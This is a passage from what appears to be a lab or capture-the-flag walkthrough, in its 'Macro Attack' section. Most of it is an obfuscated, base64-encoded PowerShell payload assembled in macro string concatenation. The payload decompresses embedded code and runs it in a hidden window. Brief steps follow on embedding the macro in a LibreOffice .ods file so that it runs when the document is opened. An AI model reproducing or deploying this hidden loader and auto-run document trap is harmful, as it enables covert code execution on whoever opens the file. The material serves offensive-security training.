Str = Str + "ZAFEAZgBQAGgAKwBHAGIATQArAGgAOABoAC8ATgB4ADEASQBKA"
Str = Str + "CcAJwArACcAJwBaAFcAagBQAEsAcwBTAEUAVgBsAEwAZABRADk"
Str = Str + "ANAA5AFEAdgAwAGEALwBwAFIANQAnACcAKwAnACcAWAB7ADAAf"
Str = Str + "QBNADQAYwBuAEEAeQBOAG0AQQBFAFEAMwBwAHEARgBxAEoAKwB"
Str = Str + "oAFQAOAA5AGgAZgAnACcAKwAnACcAcABBAC8AVgBXADkAeABTA"
Str = Str + "FkATQAyADAAaQBPAGkATwB1AHMASgAxAFoAWQB2AHIAbQBnADQ"
Str = Str + "ALwBFADUAOQByACcAJwArACcAJwB0AEgAMwBoAFgAZwA4AGUAK"
Str = Str + "wA5AFcANAB2AFEAcwA4AFIAVQBzADAAdgBUADkAcQBqAC8AdgA"
Str = Str + "5ADUAbQBaAGcAVwBFADEAbQBkAEQAUgAyAFAAZABLAFkAMwByA"
Str = Str + "GwALwBmAEQAUwBVAC8AcwBTAGMAcwBiAG0AbQA5AE8AOQB3AGI"
Str = Str + "AVABWAHIASAB0AFkARABmAEQAQwBHAGkAagB2AGIAVgBUADgAZ"
Str = Str + "AAxAE0ATwAyAHAAdQA0AE8AagA3ADcAcgB7ADAAfQBkAHEAZQA"
Str = Str + "1ADEAOQA0AHgAcQBUACsAcwBZAHUASAAwADkAWgBZAHIAVABYA"
Str = Str + "HMAWQBiAHUAVABEAHEAZgBxAFYAcQAwADEAawB3ADcAZQA5AHM"
Str = Str + "AZgBZAEgASwA4AEcAWABmAFkAJwAnACsAJwAnAHcAcwA0AGgAd"
Str = Str + "ABlAGwAWAAvAHYAbgA1AHAANAA5ADAAdwBmAHIAVABxAFYARAA"
Str = Str + "5AG8AaQB0AEkATAB7ADAAfQBwADMARAB3AEwATgA2AGcAZQA3A"
Str = Str + "HUAWgAvADMAcQA1AGIAUwA1AFUAagBxAEsAMABvAG8ANgBWAGw"
Str = Str + "AZQBsADEAewAwAH0ATQAxAFYAawBaAFYAeQArAHkAcQBZADcAT"
Str = Str + "wBqAGoAcwBlAHcAOQA4AG0AdgBlAGsAMwBZAEkAdwAzAGEAdAB"
Str = Str + "mAFUAVwBIAFQAbwB7ADEAfQBWAFgAeABsAGMAcQA5AEYAbwBSA"
Str = Str + "DIAbwBVADYAdQB7ADEAfQA1ACsAdgA3AFMAUQBDADIAdQBoAEM"
Str = Str + "AQwBYAHEAMAAxAE4AUgBmAHQANgBPAGYAaABGAEYAdQBiAHEAb"
Str = Str + "QBYADMAYgB0AGgAYwBhAFEAMgBhAGQAZgBmAGUATwB2AFEAYgB"
Str = Str + "kAGoAQwBZAFcAKwBuAHcAYwBwADYANABuAFUARgA3AHEAeQBxA"
Str = Str + "HsAMAB9AGUAbQBlAGcAdABuAHQASwBaADIASwBhADMAZgBuAFU"
Str = Str + "AVwBzADIAbgBkADIAUQArAE4AZQB0AHsAMAB9AGkAcAB4AHQAT"
Str = Str + "gBRAEEAYgBHAEsAbQAzADEAdQBxAGgAcQB2AGQAOABMAGQAagB"
Str = Str + "WAGYAZgB7ADEAfQAxAGsAZABrAFAAYwBVAGcAZQBHAG0ANwAxA"
Str = Str + "DAAdgB5AHMAUgB0AHQAcgBmADcAVAB4ADMAZgBIADAAWQByAEs"
Str = Str + "ANwAyAFQAOAAwAHEARwBKAFcAcQA5AFkASAB5AFAAYgBDAHgAe"
Str = Str + "wAxAH0ARQA3AGIAeQB4AEwALwBnADEAdgBoAE8ALwBmAGwAYQB"
Str = Str + "LAHYATAA5AEwAOQBWAG8ALwBYADcAVABnAEoAYgBBAEkAMABnA"
Str = Str + "E4ANQBkAEYARwBLAFgAeAB0ADIAOABJADQAOABvADUAaABxAFM"
Str = Str + "AeABLAGYANgBDAHMAVQAnACcAKwAnACcAUgBJAGoAQQBLAFkAV"
Str = Str + "gBnAFcASgBGAFkASQBvAFEANgBmAHsAMQB9AGwAbgByAGgAawB"
Str = Str + "sADAAbgBBADkAOABYAEoAbABhAEYAdABHAHAASgAxAGwANABFA"
Str = Str + "HAAUwBmAGgAMABTAHgAZABYAFUAMQBoAHkARAA1AGkATwBDAGs"
Str = Str + "AcgBRAHgAUgA1AEwATwBnAFgATgB1AGQAMQAyAHIAUQA0AFcAd"
Str = Str + "QA3AFcAagBPAHIAZwBGACsALwBXADQAdQB1ADkAOQBMAFIAVwB"
Str = Str + "wAGsAUABDAGMARABtAHkAVAByAEoAcgBJAE4AewAxAH0ANwBBA"
Str = Str + "G0AUwA5AE4AdgB4AGcAZwA4AHsAMQB9AHsAMQB9AG0AMwBwAGI"
Str = Str + "AYwBUAGUAQQBnADkAYwByADYAQwBUAFEARgBzADcARgBqAGkAS"
Str = Str + "ABVAEsAVwBVAHYAQQBRAHcAdQA5AGMAVABFADEANgBoAHsAMQB"
Str = Str + "9ADcARAAnACcAKwAnACcAVgA0AGUAWQBMAC8AZwAwAEEASABBA"
Str = Str + "EgAMQAnACcAKwAnACcATQAvAFIATgBLAEQARQArAEkAVgA5AE8"
Str = Str + "AMwBGAEkAWQAvAGwAYgBhADUARAAwAHEAZwBEAC8AMwAzADIAa"
Str = Str + "gB7ADAAfQB2AFAAYwBQAHAANwA5AEUAcABWAHEAWgBRAC8AUAB"
Str = Str + "UADUAdQB1AE4ARgA1ADMAOQA5ADkAMQAvAGEAbQBNAEcAZwBnA"
Str = Str + "FkAMABXAG8ASwBPAFkALwA4ADAARABIAG0AaAB2AEUAaAB1AEc"
Str = Str + "ARQBJAE4AZQBQAG4AaQBYADgASwAzAEsAVAB1ADcAZwBlACsAc"
Str = Str + "QByAE4AZgAvAEQAVAAzAEUAMABRAEcAQQBDAHcAQQBBACcAJwA"
Str = Str + "pAC0AZgAnACcAegAnACcALAAnACcAQgAnACcAKQApACkAKQAsA"
Str = Str + "FsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHM"
Str = Str + "AaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZ"
Str = Str + "QBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgB"
Str = Str + "lAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzA"
Str = Str + "GUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHM"
Str = Str + "AZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAY"
Str = Str + "QByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgB"
Str = Str + "XAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuA"
Str = Str + "CcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHc"
Str = Str + "APQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4AR"
Str = Str + "ABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwB"
Str = Str + "dADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA=="

Next, we need to ensure that we have installed the LibreOffice suite, so that we are able to put the macro inside.

We will then create the .ods file and put in our macros inside.

We also need to ensure that the macro is set for opening documents.

PreviousDVR4 NextShenzi

Last updated 1 year ago

hashtagNmap Scan

hashtagInitial Access

hashtagPort 20001

hashtagPort 79

hashtagPort 8000

hashtagPort 143

hashtagMacro Attack